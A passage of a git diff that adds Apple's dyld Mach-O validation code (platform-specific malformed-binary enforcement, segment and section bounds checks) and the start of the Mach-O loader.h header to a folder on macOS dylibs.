Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + // enforce these checks on new binaries only + if (sdk >= 0x00100000) // iOS 16 + result = true; + break; + case Malformed::noUUID: + case Malformed::sdkOnOrAfter2022: + if (sdk >= 0x00110000) // iOS 17.0 FIXME + result = true; + break; + } + break; + case Platform::watchOS: + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::dyldInfoAndlocalRelocs: + case Malformed::textPermissions: + case Malformed::executableData: + case Malformed::writableData: + result = true; + break; + case Malformed::linkeditAlignment: + case Malformed::segmentOrder: + case Malformed::linkeditPermissions: + case Malformed::codeSigAlignment: + case Malformed::sectionsAddrRangeWithinSegment: + case Malformed::noLinkedDylibs: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + // enforce these checks on new binaries only + if (sdk >= 0x00090000) // watchOS 9 + result = true; + break; + case Malformed::noUUID: + case Malformed::sdkOnOrAfter2022: + if (sdk >= 0x000A0000) // watchOS 10 FIXME + result = true; + break; + } + break; + case Platform::driverKit: + result = true; + break; + default: + result = true; + break; + } + }); + // if binary is so old, there is no platform info, don't enforce malformed errors + return result; +} + +bool MachOFile::validSegments(Diagnostics& diag, const char* path, size_t fileLen) const +{ + // check segment load command size + __block bool badSegmentLoadCommand = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* seg = (segment_command_64*)cmd; + int32_t sectionsSpace = cmd->cmdsize - sizeof(segment_command_64); + if ( sectionsSpace < 0 ) { + diag.error("in '%s' load command size too small for LC_SEGMENT_64", path); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (sectionsSpace % sizeof(section_64)) != 0 ) { + diag.error("in '%s' segment load command size 0x%X will not fit whole number of sections", path, cmd->cmdsize); + badSegmentLoadCommand = true; + stop = true; + } + else if ( sectionsSpace != (int32_t)(seg->nsects * sizeof(section_64)) ) { + diag.error("in '%s' load command size 0x%X does not match nsects %d", path, cmd->cmdsize, seg->nsects); + badSegmentLoadCommand = true; + stop = true; + } + else if ( greaterThanAddOrOverflow(seg->fileoff, seg->filesize, fileLen) ) { + diag.error("in '%s' segment load command content extends beyond end of file", path); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (seg->filesize > seg->vmsize) && ((seg->vmsize != 0) || ((seg->flags & SG_NORELOC) == 0)) ) { + // dyld should support non-allocatable __LLVM segment + diag.error("in '%s' segment '%s' filesize exceeds vmsize", path, seg->segname); + badSegmentLoadCommand = true; + stop = true; + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* seg = (segment_command*)cmd; + int32_t sectionsSpace = cmd->cmdsize - sizeof(segment_command); + if ( sectionsSpace < 0 ) { + diag.error("in '%s' load command size too small for LC_SEGMENT", path); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (sectionsSpace % sizeof(section)) != 0 ) { + diag.error("in '%s' segment load command size 0x%X will not fit whole number of sections", path, cmd->cmdsize); + badSegmentLoadCommand = true; + stop = true; + } + else if ( sectionsSpace != (int32_t)(seg->nsects * sizeof(section)) ) { + diag.error("in '%s' load command size 0x%X does not match nsects %d", path, cmd->cmdsize, seg->nsects); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (seg->filesize > seg->vmsize) && ((seg->vmsize != 0) || ((seg->flags & SG_NORELOC) == 0)) ) { + // dyld should support non-allocatable __LLVM segment + diag.error("in '%s' segment '%s' filesize exceeds vmsize", path, seg->segname); + badSegmentLoadCommand = true; + stop = true; + } + } + }); + if ( badSegmentLoadCommand ) + return false; + + // check mapping permissions of segments + __block bool badPermissions = false; + __block bool badSize = false; + __block bool hasTEXT = false; + __block bool hasLINKEDIT = false; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( strcmp(info.segName, "__TEXT") == 0 ) { + if ( (info.protections != (VM_PROT_READ|VM_PROT_EXECUTE)) && enforceFormat(Malformed::textPermissions) ) { + diag.error("in '%s' __TEXT segment permissions is not 'r-x'", path); + badPermissions = true; + stop = true; + } + hasTEXT = true; + } + else if ( strcmp(info.segName, "__LINKEDIT") == 0 ) { + if ( (info.protections != VM_PROT_READ) && enforceFormat(Malformed::linkeditPermissions) ) { + diag.error("in '%s' __LINKEDIT segment permissions is not 'r--'", path); + badPermissions = true; + stop = true; + } + hasLINKEDIT = true; + } + else if ( (info.protections & 0xFFFFFFF8) != 0 ) { + diag.error("in '%s' %s segment permissions has invalid bits set", path, info.segName); + badPermissions = true; + stop = true; + } + if ( greaterThanAddOrOverflow(info.fileOffset, info.fileSize, fileLen) ) { + diag.error("in '%s' %s segment content extends beyond end of file", path, info.segName); + badSize = true; + stop = true; + } + if ( is64() ) { + if ( info.vmAddr+info.vmSize < info.vmAddr ) { + diag.error("in '%s' %s segment vm range wraps", path, info.segName); + badSize = true; + stop = true; + } + } + else { + if ( (uint32_t)(info.vmAddr+info.vmSize) < (uint32_t)(info.vmAddr) ) { + diag.error("in '%s' %s segment vm range wraps", path, info.segName); + badSize = true; + stop = true; + } + } + }); + if ( badPermissions || badSize ) + return false; + if ( !hasTEXT ) { + diag.error("in '%s' missing __TEXT segment", path); + return false; + } + if ( !hasLINKEDIT && !this->isPreload() ) { + diag.error("in '%s' missing __LINKEDIT segment", path); + return false; + } + + // check for overlapping segments + __block bool badSegments = false; + forEachSegment(^(const SegmentInfo& info1, bool& stop1) { + uint64_t seg1vmEnd = info1.vmAddr + info1.vmSize; + uint64_t seg1FileEnd = info1.fileOffset + info1.fileSize; + forEachSegment(^(const SegmentInfo& info2, bool& stop2) { + if ( info1.segIndex == info2.segIndex ) + return; + uint64_t seg2vmEnd = info2.vmAddr + info2.vmSize; + uint64_t seg2FileEnd = info2.fileOffset + info2.fileSize; + if ( ((info2.vmAddr <= info1.vmAddr) && (seg2vmEnd > info1.vmAddr) && (seg1vmEnd > info1.vmAddr )) || ((info2.vmAddr >= info1.vmAddr ) && (info2.vmAddr < seg1vmEnd) && (seg2vmEnd > info2.vmAddr)) ) { + diag.error("in '%s' segment %s vm range overlaps segment %s", path, info1.segName, info2.segName); + badSegments = true; + stop1 = true; + stop2 = true; + } + if ( ((info2.fileOffset <= info1.fileOffset) && (seg2FileEnd > info1.fileOffset) && (seg1FileEnd > info1.fileOffset)) || ((info2.fileOffset >= info1.fileOffset) && (info2.fileOffset < seg1FileEnd) && (seg2FileEnd > info2.fileOffset )) ) { + if ( !inDyldCache() ) { + // HACK: Split shared caches might put the __TEXT in a SubCache, then the __DATA in a later SubCache. + // The file offsets are in to each SubCache file, which means that they might overlap + // For now we have no choice but to disable this error + diag.error("in '%s' segment %s file content overlaps segment %s", path, info1.segName, info2.segName); + badSegments = true; + stop1 = true; + stop2 = true; + } + } + if ( (info1.segIndex < info2.segIndex) && !stop1 ) { + if ( (info1.vmAddr > info2.vmAddr) || ((info1.fileOffset > info2.fileOffset ) && (info1.fileOffset != 0) && (info2.fileOffset != 0)) ){ + if ( !inDyldCache() && enforceFormat(Malformed::segmentOrder) && !isStaticExecutable() ) { + // whitelist go libraries __DWARF segments + if ( (strcmp(info1.segName, "__DWARF") != 0 && strcmp(info2.segName, "__DWARF") != 0) ) { + // dyld cache __DATA_* segments are moved around + // The static kernel also has segments with vmAddr's before __TEXT + diag.error("in '%s' segment load commands out of order with respect to layout for %s and %s", path, info1.segName, info2.segName); + badSegments = true; + stop1 = true; + stop2 = true; + } + } + } + } + }); + }); + if ( badSegments ) + return false; + + // check sections are within segment + __block bool badSections = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* seg = (segment_command_64*)cmd; + const section_64* const sectionsStart = (section_64*)((char*)seg + sizeof(struct segment_command_64)); + const section_64* const sectionsEnd = §ionsStart[seg->nsects]; + for (const section_64* sect=sectionsStart; (sect < sectionsEnd); ++sect) { + if ( (int64_t)(sect->size) < 0 ) { + diag.error("in '%s' section '%s' size too large 0x%llX", path, sect->sectname, sect->size); + badSections = true; + } + else if ( sect->addr < seg->vmaddr ) { + diag.error("in '%s' section '%s' start address 0x%llX is before containing segment's address 0x%0llX", path, sect->sectname, sect->addr, seg->vmaddr); + badSections = true; + } + else if ( sect->addr+sect->size > seg->vmaddr+seg->vmsize ) { + bool ignoreError = !enforceFormat(Malformed::sectionsAddrRangeWithinSegment); +#if BUILDING_APP_CACHE_UTIL + if ( (seg->vmsize == 0) && !strcmp(seg->segname, "__CTF") ) + ignoreError = true; +#endif + if ( !ignoreError ) { + diag.error("in '%s' section '%s' end address 0x%llX is beyond containing segment's end address 0x%0llX", path, sect->sectname, sect->addr+sect->size, seg->vmaddr+seg->vmsize); + badSections = true; + } + } + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* seg = (segment_command*)cmd; + const section* const sectionsStart = (section*)((char*)seg + sizeof(struct segment_command)); + const section* const sectionsEnd = §ionsStart[seg->nsects]; + for (const section* sect=sectionsStart; !stop && (sect < sectionsEnd); ++sect) { + if ( (int64_t)(sect->size) < 0 ) { + diag.error("in '%s' section %s size too large 0x%X", path, sect->sectname, sect->size); + badSections = true; + } + else if ( sect->addr < seg->vmaddr ) { + diag.error("in '%s' section %s start address 0x%X is before containing segment's address 0x%0X", path, sect->sectname, sect->addr, seg->vmaddr); + badSections = true; + } + else if ( sect->addr+sect->size > seg->vmaddr+seg->vmsize ) { + diag.error("in '%s' section %s end address 0x%X is beyond containing segment's end address 0x%0X", path, sect->sectname, sect->addr+sect->size, seg->vmaddr+seg->vmsize); + badSections = true; + } + } + } + }); + + return !badSections; +} + +void MachOFile::forEachSingletonPatch(Diagnostics& diag, void (^handler)(SingletonPatchKind kind, + uint64_t runtimeOffset)) const +{ + uint32_t ptrSize = this->pointerSize(); + uint32_t elementSize = (2 * ptrSize); + uint64_t loadAddress = this->preferredLoadAddress(); + this->forEachSection(^(const SectionInfo §Info, bool malformedSectionRange, bool &stop) { + if ( strcmp(sectInfo.sectName, "__const_cfobj2") != 0 ) + return; + stop = true; + + if ( (sectInfo.sectSize % elementSize) != 0 ) { + diag.error("Incorrect patching size (%lld). Should be a multiple of (2 * ptrSize)", sectInfo.sectSize); + return; + } + + if ( sectInfo.reserved2 != elementSize ) { + // ld64 must have rejected one or more of the elements in the section, so + // didn't set the reserved2 to let us patch + diag.error("reserved2 is unsupported value %d. Expected %d", + sectInfo.reserved2, elementSize); + return; + } + + for ( uint64_t offset = 0; offset != sectInfo.sectSize; offset += elementSize ) { + uint64_t targetRuntimeOffset = (sectInfo.sectAddr + offset) - loadAddress; + handler(SingletonPatchKind::cfObj2, targetRuntimeOffset); + } + }); +} + + +} // namespace dyld3 diff --git a/IV. Dylibs/macos/loader.h b/IV. Dylibs/macos/loader.h new file mode 100644 index 0000000..bf156dc --- /dev/null +++ b/IV. Dylibs/macos/loader.h @@ -0,0 +1,1590 @@ +// Source: https://github.com/apple-oss-distributions/xnu/blob/rel/xnu-10002/EXTERNAL_HEADERS/mach-o/loader.h +/* + * Copyright (c) 1999-2019 Apple Inc. All Rights Reserved. + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ +#ifndef _MACHO_LOADER_H_ +#define _MACHO_LOADER_H_ + +/* + * This file describes the format of mach object files. + */ +#include + +/* + * is needed here for the cpu_type_t and cpu_subtype_t types + * and contains the constants for the possible values of these types. + */ +#include + +/* + * is needed here for the vm_prot_t type and contains the + * constants that are or'ed together for the possible values of this type. + */ +#include + +/* + * is expected to define the flavors of the thread + * states and the structures of those flavors for each machine. + */ +#include +#include + +/* + * The 32-bit mach header appears at the very beginning of the object file for + * 32-bit architectures. + */ +struct mach_header { + uint32_t magic; /* mach magic number identifier */ + cpu_type_t cputype; /* cpu specifier */ + cpu_subtype_t cpusubtype; /* machine specifier */ + uint32_t filetype; /* type of file */ + uint32_t ncmds; /* number of load commands */ + uint32_t sizeofcmds; /* the size of all the load commands */ + uint32_t flags; /* flags */ +}; + +/* Constant for the magic field of the mach_header (32-bit architectures) */ +#define MH_MAGIC 0xfeedface /* the mach magic number */ +#define MH_CIGAM 0xcefaedfe /* NXSwapInt(MH_MAGIC) */ + +/* + * The 64-bit mach header appears at the very beginning of object files for + * 64-bit architectures. + */ +struct mach_header_64 { + uint32_t magic; /* mach magic number identifier */ + cpu_type_t cputype; /* cpu specifier */ + cpu_subtype_t cpusubtype; /* machine specifier */ + uint32_t filetype; /* type of file */ + uint32_t ncmds; /* number of load commands */ + uint32_t sizeofcmds; /* the size of all the load commands */ + uint32_t flags; /* flags */ + uint32_t reserved; /* reserved */ +}; + +/* Constant for the magic field of the mach_header_64 (64-bit architectures) */ +#define MH_MAGIC_64 0xfeedfacf /* the 64-bit mach magic number */ +#define MH_CIGAM_64 0xcffaedfe /* NXSwapInt(MH_MAGIC_64) */ + +/* + * The layout of the file depends on the filetype. For all but the MH_OBJECT + * file type the segments are padded out and aligned on a segment alignment + * boundary for efficient demand pageing. The MH_EXECUTE, MH_FVMLIB, MH_DYLIB, + * MH_DYLINKER and MH_BUNDLE file types also have the headers included as part + * of their first segment. + * + * The file type MH_OBJECT is a compact format intended as output of the + * assembler and input (and possibly output) of the link editor (the .o + * format). All sections are in one unnamed segment with no segment padding. + * This format is used as an executable format when the file is so small the + * segment padding greatly increases its size. + * + * The file type MH_PRELOAD is an executable format intended for things that + * are not executed under the kernel (proms, stand alones, kernels, etc). The + * format can be executed under the kernel but may demand paged it and not + * preload it before execution. + * + * A core file is in MH_CORE format and can be any in an arbritray legal + * Mach-O file. + * + * Constants for the filetype field of the mach_header + */ +#define MH_OBJECT 0x1 /* relocatable object file */ +#define MH_EXECUTE 0x2 /* demand paged executable file */ +#define MH_FVMLIB 0x3 /* fixed VM shared library file */ +#define MH_CORE 0x4 /* core file */ +#define MH_PRELOAD 0x5 /* preloaded executable file */ +#define MH_DYLIB 0x6 /* dynamically bound shared library */ +#define MH_DYLINKER 0x7 /* dynamic link editor */ +#define MH_BUNDLE 0x8 /* dynamically bound bundle file */ +#define MH_DYLIB_STUB 0x9 /* shared library stub for static */ + /* linking only, no section contents */ +#define MH_DSYM 0xa /* companion file with only debug */ + /* sections */ +#define MH_KEXT_BUNDLE 0xb /* x86_64 kexts */ +#define MH_FILESET 0xc /* set of mach-o's */ + +/* Constants for the flags field of the mach_header */ +#define MH_NOUNDEFS 0x1 /* the object file has no undefined + references */ +#define MH_INCRLINK 0x2 /* the object file is the output of an + incremental link against a base file + and can't be link edited again */ +#define MH_DYLDLINK 0x4 /* the object file is input for the + dynamic linker and can't be staticly + link edited again */ +#define MH_BINDATLOAD 0x8 /* the object file's undefined + references are bound by the dynamic + linker when loaded. */ +#define MH_PREBOUND 0x10 /* the file has its dynamic undefined + references prebound. */ +#define MH_SPLIT_SEGS 0x20 /* the file has its read-only and + read-write segments split */ +#define MH_LAZY_INIT 0x40 /* the shared library init routine is + to be run lazily via catching memory + faults to its writeable segments + (obsolete) */ +#define MH_TWOLEVEL 0x80 /* the image is using two-level name + space bindings */ +#define MH_FORCE_FLAT 0x100 /* the executable is forcing all images + to use flat name space bindings */ +#define MH_NOMULTIDEFS 0x200 /* this umbrella guarantees no multiple + defintions of symbols in its + sub-images so the two-level namespace + hints can always be used. */ +#define MH_NOFIXPREBINDING 0x400 /* do not have dyld notify the + prebinding agent about this + executable */ +#define MH_PREBINDABLE 0x800 /* the binary is not prebound but can + have its prebinding redone. only used + when MH_PREBOUND is not set. */ +#define MH_ALLMODSBOUND 0x1000 /* indicates that this binary binds to + all two-level namespace modules of + its dependent libraries. only used + when MH_PREBINDABLE and MH_TWOLEVEL + are both set. */ +#define MH_SUBSECTIONS_VIA_SYMBOLS 0x2000/* safe to divide up the sections into + sub-sections via symbols for dead + code stripping */ +#define MH_CANONICAL 0x4000 /* the binary has been canonicalized + via the unprebind operation */ +#define MH_WEAK_DEFINES 0x8000 /* the final linked image contains + external weak symbols */ +#define MH_BINDS_TO_WEAK 0x10000 /* the final linked image uses + weak symbols */ + +#define MH_ALLOW_STACK_EXECUTION 0x20000/* When this bit is set, all stacks + in the task will be given stack + execution privilege. Only used in + MH_EXECUTE filetypes. */ +#define MH_ROOT_SAFE 0x40000 /* When this bit is set, the binary + declares it is safe for use in + processes with uid zero */ + +#define MH_SETUID_SAFE 0x80000 /* When this bit is set, the binary + declares it is safe for use in + processes when issetugid() is true */ + +#define MH_NO_REEXPORTED_DYLIBS 0x100000 /* When this bit is set on a dylib, + the static linker does not need to + examine dependent dylibs to see + if any are re-exported */ +#define MH_PIE 0x200000 /* When this bit is set, the OS will + load the main executable at a + random address. Only used in + MH_EXECUTE filetypes. */ +#define MH_DEAD_STRIPPABLE_DYLIB 0x400000 /* Only for use on dylibs. When + linking against a dylib that + has this bit set, the static linker + will automatically not create a + LC_LOAD_DYLIB load command to the + dylib if no symbols are being + referenced from the dylib. */ +#define MH_HAS_TLV_DESCRIPTORS 0x800000 /* Contains a section of type + S_THREAD_LOCAL_VARIABLES */ + +#define MH_NO_HEAP_EXECUTION 0x1000000 /* When this bit is set, the OS will + run the main executable with + a non-executable heap even on + platforms (e.g. i386) that don't + require it. Only used in MH_EXECUTE + filetypes. */ + +#define MH_APP_EXTENSION_SAFE 0x02000000 /* The code was linked for use in an + application extension. */ + +#define MH_NLIST_OUTOFSYNC_WITH_DYLDINFO 0x04000000 /* The external symbols + listed in the nlist symbol table do + not include all the symbols listed in + the dyld info. */ + +#define MH_SIM_SUPPORT 0x08000000 /* Allow LC_MIN_VERSION_MACOS and + LC_BUILD_VERSION load commands with + the platforms macOS, iOSMac, + iOSSimulator, tvOSSimulator and + watchOSSimulator. */ + +#define MH_DYLIB_IN_CACHE 0x80000000 /* Only for use on dylibs. When this bit + is set, the dylib is part of the dyld + shared cache, rather than loose in + the filesystem. */ + +/* + * The load commands directly follow the mach_header. The total size of all + * of the commands is given by the sizeofcmds field in the mach_header. All + * load commands must have as their first two fields cmd and cmdsize. The cmd + * field is filled in with a constant for that command type. Each command type + * has a structure specifically for it. The cmdsize field is the size in bytes + * of the particular load command structure plus anything that follows it that + * is a part of the load command (i.e. section structures, strings, etc.). To + * advance to the next load command the cmdsize can be added to the offset or + * pointer of the current load command. The cmdsize for 32-bit architectures + * MUST be a multiple of 4 bytes and for 64-bit architectures MUST be a multiple + * of 8 bytes (these are forever the maximum alignment of any load commands). + * The padded bytes must be zero. All tables in the object file must also + * follow these rules so the file can be memory mapped. Otherwise the pointers + * to these tables will not work well or at all on some machines. With all + * padding zeroed like objects will compare byte for byte. + */ +struct load_command { + uint32_t cmd; /* type of load command */ + uint32_t cmdsize; /* total size of command in bytes */ +}; + +/* + * After MacOS X 10.1 when a new load command is added that is required to be + * understood by the dynamic linker for the image to execute properly the + * LC_REQ_DYLD bit will be or'ed into the load command constant. If the dynamic + * linker sees such a load command it it does not understand will issue a + * "unknown load command required for execution" error and refuse to use the + * image. Other load commands without this bit that are not understood will + * simply be ignored. + */ +#define LC_REQ_DYLD 0x80000000 + +/* Constants for the cmd field of all load commands, the type */ +#define LC_SEGMENT 0x1 /* segment of this file to be mapped */ +#define LC_SYMTAB 0x2 /* link-edit stab symbol table info */ +#define LC_SYMSEG 0x3 /* link-edit gdb symbol table info (obsolete) */ +#define LC_THREAD 0x4 /* thread */ +#define LC_UNIXTHREAD 0x5 /* unix thread (includes a stack) */ +#define LC_LOADFVMLIB 0x6 /* load a specified fixed VM shared library */ +#define LC_IDFVMLIB 0x7 /* fixed VM shared library identification */ +#define LC_IDENT 0x8 /* object identification info (obsolete) */ +#define LC_FVMFILE 0x9 /* fixed VM file inclusion (internal use) */ +#define LC_PREPAGE 0xa /* prepage command (internal use) */ +#define LC_DYSYMTAB 0xb /* dynamic link-edit symbol table info */ +#define LC_LOAD_DYLIB 0xc /* load a dynamically linked shared library */ +#define LC_ID_DYLIB 0xd /* dynamically linked shared lib ident */ +#define LC_LOAD_DYLINKER 0xe /* load a dynamic linker */ +#define LC_ID_DYLINKER 0xf /* dynamic linker identification */ +#define LC_PREBOUND_DYLIB 0x10 /* modules prebound for a dynamically */ + /* linked shared library */ +#define LC_ROUTINES 0x11 /* image routines */ +#define LC_SUB_FRAMEWORK 0x12 /* sub framework */ +#define LC_SUB_UMBRELLA 0x13 /* sub umbrella */ +#define LC_SUB_CLIENT 0x14 /* sub client */ +#define LC_SUB_LIBRARY 0x15 /* sub library */ +#define LC_TWOLEVEL_HINTS 0x16 /* two-level namespace lookup hints */ +#define LC_PREBIND_CKSUM 0x17 /* prebind checksum */ + +/* + * load a dynamically linked shared library that is allowed to be missing + * (all symbols are weak imported). + */ +#define LC_LOAD_WEAK_DYLIB (0x18 | LC_REQ_DYLD) + +#define LC_SEGMENT_64 0x19 /* 64-bit segment of this file to be + mapped */ +#define LC_ROUTINES_64 0x1a /* 64-bit image routines */ +#define LC_UUID 0x1b /* the uuid */ +#define LC_RPATH (0x1c | LC_REQ_DYLD) /* runpath additions */ +#define LC_CODE_SIGNATURE 0x1d /* local of code signature */ +#define LC_SEGMENT_SPLIT_INFO 0x1e /* local of info to split segments */ +#define LC_REEXPORT_DYLIB (0x1f | LC_REQ_DYLD) /* load and re-export dylib */ +#define LC_LAZY_LOAD_DYLIB 0x20 /* delay load of dylib until first use */ +#define LC_ENCRYPTION_INFO 0x21 /* encrypted segment information */ +#define LC_DYLD_INFO 0x22 /* compressed dyld information */ +#define LC_DYLD_INFO_ONLY (0x22|LC_REQ_DYLD) /* compressed dyld information only */ +#define LC_LOAD_UPWARD_DYLIB (0x23 | LC_REQ_DYLD) /* load upward dylib */ +#define LC_VERSION_MIN_MACOSX 0x24 /* build for MacOSX min OS version */ +#define LC_VERSION_MIN_IPHONEOS 0x25 /* build for iPhoneOS min OS version */ +#define LC_FUNCTION_STARTS 0x26 /* compressed table of function start addresses */ +#define LC_DYLD_ENVIRONMENT 0x27 /* string for dyld to treat + like environment variable */ +#define LC_MAIN (0x28|LC_REQ_DYLD) /* replacement for LC_UNIXTHREAD */ +#define LC_DATA_IN_CODE 0x29 /* table of non-instructions in __text */ +#define LC_SOURCE_VERSION 0x2A /* source version used to build binary */ +#define LC_DYLIB_CODE_SIGN_DRS 0x2B /* Code signing DRs copied from linked dylibs */ +#define LC_ENCRYPTION_INFO_64 0x2C /* 64-bit encrypted segment information */ +#define LC_LINKER_OPTION 0x2D /* linker options in MH_OBJECT files */ +#define LC_LINKER_OPTIMIZATION_HINT 0x2E /* optimization hints in MH_OBJECT files */ +#define LC_VERSION_MIN_TVOS 0x2F /* build for AppleTV min OS version */ +#define LC_VERSION_MIN_WATCHOS 0x30 /* build for Watch min OS version */ +#define LC_NOTE 0x31 /* arbitrary data included within a Mach-O file */ +#define LC_BUILD_VERSION 0x32 /* build for platform min OS version */ +#define LC_DYLD_EXPORTS_TRIE (0x33 | LC_REQ_DYLD) /* used with linkedit_data_command, payload is trie */ +#define LC_DYLD_CHAINED_FIXUPS (0x34 | LC_REQ_DYLD) /* used with linkedit_data_command */ +#define LC_FILESET_ENTRY (0x35 | LC_REQ_DYLD) /* used with fileset_entry_command */ + +/* + * A variable length string in a load command is represented by an lc_str + * union. The strings are stored just after the load command structure and + * the offset is from the start of the load command structure. The size + * of the string is reflected in the cmdsize field of the load command. + * Once again any padded bytes to bring the cmdsize field to a multiple + * of 4 bytes must be zero. + */ +union lc_str { + uint32_t offset; /* offset to the string */ +#ifndef __LP64__ + char *ptr; /* pointer to the string */ +#endif +}; + +/* + * The segment load command indicates that a part of this file is to be + * mapped into the task's address space. The size of this segment in memory, + * vmsize, maybe equal to or larger than the amount to map from this file, + * filesize. The file is mapped starting at fileoff to the beginning of + * the segment in memory, vmaddr. The rest of the memory of the segment, + * if any, is allocated zero fill on demand. The segment's maximum virtual + * memory protection and initial virtual memory protection are specified + * by the maxprot and initprot fields. If the segment has sections then the + * section structures directly follow the segment command and their size is + * reflected in cmdsize. + */ +struct segment_command { /* for 32-bit architectures */ + uint32_t cmd; /* LC_SEGMENT */ + uint32_t cmdsize; /* includes sizeof section structs */ + char segname[16]; /* segment name */ + uint32_t vmaddr; /* memory address of this segment */ + uint32_t vmsize; /* memory size of this segment */ + uint32_t fileoff; /* file offset of this segment */ + uint32_t filesize; /* amount to map from the file */ + vm_prot_t maxprot; /* maximum VM protection */ + vm_prot_t initprot; /* initial VM protection */ + uint32_t nsects; /* number of sections in segment */ + uint32_t flags; /* flags */ +}; + +/* + * The 64-bit segment load command indicates that a part of this file is to be + * mapped into a 64-bit task's address space. If the 64-bit segment has + * sections then section_64 structures directly follow the 64-bit segment + * command and their size is reflected in cmdsize. + */ +struct segment_command_64 { /* for 64-bit architectures */ + uint32_t cmd; /* LC_SEGMENT_64 */ + uint32_t cmdsize; /* includes sizeof section_64 structs */ + char segname[16]; /* segment name */ + uint64_t vmaddr; /* memory address of this segment */ + uint64_t vmsize; /* memory size of this segment */ + uint64_t fileoff; /* file offset of this segment */ + uint64_t filesize; /* amount to map from the file */ + vm_prot_t maxprot; /* maximum VM protection */ + vm_prot_t initprot; /* initial VM protection */ + uint32_t nsects; /* number of sections in segment */ + uint32_t flags; /* flags */ +}; + +/* Constants for the flags field of the segment_command */ +#define SG_HIGHVM 0x1 /* the file contents for this segment is for + the high part of the VM space, the low part + is zero filled (for stacks in core files) */ +#define SG_FVMLIB 0x2 /* this segment is the VM that is allocated by + a fixed VM library, for overlap checking in + the link editor */ +#define SG_NORELOC 0x4 /* this segment has nothing that was relocated + in it and nothing relocated to it, that is + it maybe safely replaced without relocation*/ +#define SG_PROTECTED_VERSION_1 0x8 /* This segment is protected. If the + segment starts at file offset 0, the + first page of the segment is not + protected. All other pages of the + segment are protected. */ +#define SG_READ_ONLY 0x10 /* This segment is made read-only after fixups */ + + + +/* + * A segment is made up of zero or more sections. Non-MH_OBJECT files have + * all of their segments with the proper sections in each, and padded to the + * specified segment alignment when produced by the link editor. The first + * segment of a MH_EXECUTE and MH_FVMLIB format file contains the mach_header + * and load commands of the object file before its first section. The zero + * fill sections are always last in their segment (in all formats). This + * allows the zeroed segment padding to be mapped into memory where zero fill + * sections might be. The gigabyte zero fill sections, those with the section + * type S_GB_ZEROFILL, can only be in a segment with sections of this type. + * These segments are then placed after all other segments. + * + * The MH_OBJECT format has all of its sections in one segment for + * compactness. There is no padding to a specified segment boundary and the + * mach_header and load commands are not part of the segment. + * + * Sections with the same section name, sectname, going into the same segment, + * segname, are combined by the link editor. The resulting section is aligned + * to the maximum alignment of the combined sections and is the new section's + * alignment. The combined sections are aligned to their original alignment in + * the combined section. Any padded bytes to get the specified alignment are + * zeroed. + * + * The format of the relocation entries referenced by the reloff and nreloc + * fields of the section structure for mach object files is described in the + * header file . + */ +struct section { /* for 32-bit architectures */ + char sectname[16]; /* name of this section */ + char segname[16]; /* segment this section goes in */ + uint32_t addr; /* memory address of this section */ + uint32_t size; /* size in bytes of this section */ + uint32_t offset; /* file offset of this section */ + uint32_t align; /* section alignment (power of 2) */ + uint32_t reloff; /* file offset of relocation entries */ + uint32_t nreloc; /* number of relocation entries */ + uint32_t flags; /* flags (section type and attributes)*/ + uint32_t reserved1; /* reserved (for offset or index) */ + uint32_t reserved2; /* reserved (for count or sizeof) */ +}; + +struct section_64 { /* for 64-bit architectures */ + char sectname[16]; /* name of this section */ + char segname[16]; /* segment this section goes in */ + uint64_t addr; /* memory address of this section */ + uint64_t size; /* size in bytes of this section */ + uint32_t offset; /* file offset of this section */ + uint32_t align; /* section alignment (power of 2) */ + uint32_t reloff; /* file offset of relocation entries */ + uint32_t nreloc; /* number of relocation entries */ + uint32_t flags; /* flags (section type and attributes)*/ + uint32_t reserved1; /* reserved (for offset or index) */ + uint32_t reserved2; /* reserved (for count or sizeof) */ + uint32_t reserved3; /* reserved */ +}; + +/* + * The flags field of a section structure is separated into two parts a section + * type and section attributes. The section types are mutually exclusive (it + * can only have one type) but the section attributes are not (it may have more + * than one attribute). + */ +#define SECTION_TYPE 0x000000ff /* 256 section types */ +#define SECTION_ATTRIBUTES 0xffffff00 /* 24 section attributes */ + +/* Constants for the type of a section */ +#define S_REGULAR 0x0 /* regular section */ +#define S_ZEROFILL 0x1 /* zero fill on demand section */ +#define S_CSTRING_LITERALS 0x2 /* section with only literal C strings*/ +#define S_4BYTE_LITERALS 0x3 /* section with only 4 byte literals */ +#define S_8BYTE_LITERALS 0x4 /* section with only 8 byte literals */ +#define S_LITERAL_POINTERS 0x5 /* section with only pointers to */ + /* literals */ +/* + * For the two types of symbol pointers sections and the symbol stubs section + * they have indirect symbol table entries. For each of the entries in the + * section the indirect symbol table entries, in corresponding order in the + * indirect symbol table, start at the index stored in the reserved1 field + * of the section structure. Since the indirect symbol table entries + * correspond to the entries in the section the number of indirect symbol table + * entries is inferred from the size of the section divided by the size of the + * entries in the section. For symbol pointers sections the size of the entries + * in the section is 4 bytes and for symbol stubs sections the byte size of the + * stubs is stored in 